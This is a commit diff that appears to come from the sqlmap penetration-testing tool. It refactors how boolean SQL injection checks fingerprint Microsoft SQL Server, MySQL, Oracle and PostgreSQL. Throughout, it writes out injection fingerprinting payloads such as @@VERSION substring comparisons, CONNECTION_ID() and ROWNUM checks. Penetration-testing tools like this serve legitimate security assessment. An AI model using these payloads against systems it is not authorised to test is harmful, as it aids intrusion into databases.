OR based inference works for the first time in history and fingerprint of 4 major DBMSes is now injection based (instead of AND)

2025-12-07 13:11:29 +00:00 · 2010-12-06 18:20:57 +00:00
parent e4b51dd549
commit d77ddbee47
8 changed files with 36 additions and 40 deletions
--- a/plugins/dbms/mssqlserver/fingerprint.py
+++ b/plugins/dbms/mssqlserver/fingerprint.py
@@ -92,8 +92,7 @@ class Fingerprint(GenericFingerprint):
            result = True
        else:
            randInt = randomInt()
-            payload = agent.fullPayload("AND BINARY_CHECKSUM(%d)=BINARY_CHECKSUM(%d)" % (randInt, randInt))
-            result  = Request.queryPage(payload)
+            result = inject.checkBooleanExpression("BINARY_CHECKSUM(%d)=BINARY_CHECKSUM(%d)" % (randInt, randInt))

        if result:
            infoMsg = "confirming Microsoft SQL Server"
@@ -101,13 +100,12 @@ class Fingerprint(GenericFingerprint):

            for version in (0, 5, 8):
                randInt = randomInt()
-                query   = "AND %d=(SELECT (CASE WHEN (( SUBSTRING((@@VERSION), 22, 1)=2 AND SUBSTRING((@@VERSION), 25, 1)=%d ) OR ( SUBSTRING((@@VERSION), 23, 1)=2 AND SUBSTRING((@@VERSION), 26, 1)=%d )) THEN %d ELSE %d END))" % (randInt, version, version, randInt, (randInt + 1))
+                check   = "%d=(SELECT (CASE WHEN (( SUBSTRING((@@VERSION), 22, 1)=2 AND SUBSTRING((@@VERSION), 25, 1)=%d ) OR ( SUBSTRING((@@VERSION), 23, 1)=2 AND SUBSTRING((@@VERSION), 26, 1)=%d )) THEN %d ELSE %d END))" % (randInt, version, version, randInt, (randInt + 1))

                if conf.direct:
-                    query = query.replace("AND ", "SELECT 1 WHERE ", 1)
+                    check = "SELECT 1 WHERE " + check

-                payload = agent.fullPayload(query)
-                result  = Request.queryPage(payload)
+                result = inject.checkBooleanExpression(check)

                if result:
                    if version == 8:
@@ -126,9 +124,8 @@ class Fingerprint(GenericFingerprint):
                        break

                    else:
-                        query   = "AND %d=(SELECT (CASE WHEN (SUBSTRING((@@VERSION), 22, 1)=7) THEN %d ELSE %d END))" % (randInt, randInt, (randInt + 1))
-                        payload = agent.fullPayload(query)
-                        result  = Request.queryPage(payload)
+                        check   = "%d=(SELECT (CASE WHEN (SUBSTRING((@@VERSION), 22, 1)=7) THEN %d ELSE %d END))" % (randInt, randInt, (randInt + 1))
+                        result = inject.checkBooleanExpression(check)

                        if result:
                            kb.dbmsVersion = ["7.0"]
--- a/plugins/dbms/mysql/fingerprint.py
+++ b/plugins/dbms/mysql/fingerprint.py
@@ -163,15 +163,13 @@ class Fingerprint(GenericFingerprint):
        logger.info(infoMsg)

        randInt = getUnicode(randomInt(1))
-        payload = agent.fullPayload("AND CONNECTION_ID()=CONNECTION_ID()")
-        result = Request.queryPage(payload)
+        result = inject.checkBooleanExpression("CONNECTION_ID()=CONNECTION_ID()")

        if result:
            infoMsg = "confirming MySQL"
            logger.info(infoMsg)

-            payload = agent.fullPayload("AND ISNULL(1/0)" if kb.injection.place != PLACE.URI else "AND ISNULL(1 DIV 0)")
-            result = Request.queryPage(payload)
+            result = inject.checkBooleanExpression("ISNULL(1/0)" if kb.injection.place != PLACE.URI else "ISNULL(1 DIV 0)")

            if not result:
                warnMsg = "the back-end DBMS is not MySQL"
--- a/plugins/dbms/oracle/fingerprint.py
+++ b/plugins/dbms/oracle/fingerprint.py
@@ -80,8 +80,7 @@ class Fingerprint(GenericFingerprint):
        if conf.direct:
            result = True
        else:
-            payload = agent.fullPayload("AND ROWNUM=ROWNUM")
-            result  = Request.queryPage(payload)
+            result = inject.checkBooleanExpression("ROWNUM=ROWNUM")

        if result:
            logMsg = "confirming Oracle"
@@ -92,8 +91,7 @@ class Fingerprint(GenericFingerprint):
            if conf.direct:
                result = True
            else:
-                payload = agent.fullPayload("AND LENGTH(SYSDATE)=LENGTH(SYSDATE)")
-                result  = Request.queryPage(payload)
+                result = inject.checkBooleanExpression("LENGTH(SYSDATE)=LENGTH(SYSDATE)")

            if not result:
                warnMsg = "the back-end DBMS is not Oracle"
--- a/plugins/dbms/postgresql/fingerprint.py
+++ b/plugins/dbms/postgresql/fingerprint.py
@@ -86,15 +86,13 @@ class Fingerprint(GenericFingerprint):

        randInt = getUnicode(randomInt(1))

-        payload = agent.fullPayload("AND %s::int=%s" % (randInt, randInt))
-        result  = Request.queryPage(payload)
+        result = inject.checkBooleanExpression("%s::int=%s" % (randInt, randInt))

        if result:
            infoMsg = "confirming PostgreSQL"
            logger.info(infoMsg)

-            payload = agent.fullPayload("AND COALESCE(%s, NULL)=%s" % (randInt, randInt))
-            result  = Request.queryPage(payload)
+            result = inject.checkBooleanExpression("COALESCE(%s, NULL)=%s" % (randInt, randInt))

            if not result:
                warnMsg = "the back-end DBMS is not PostgreSQL"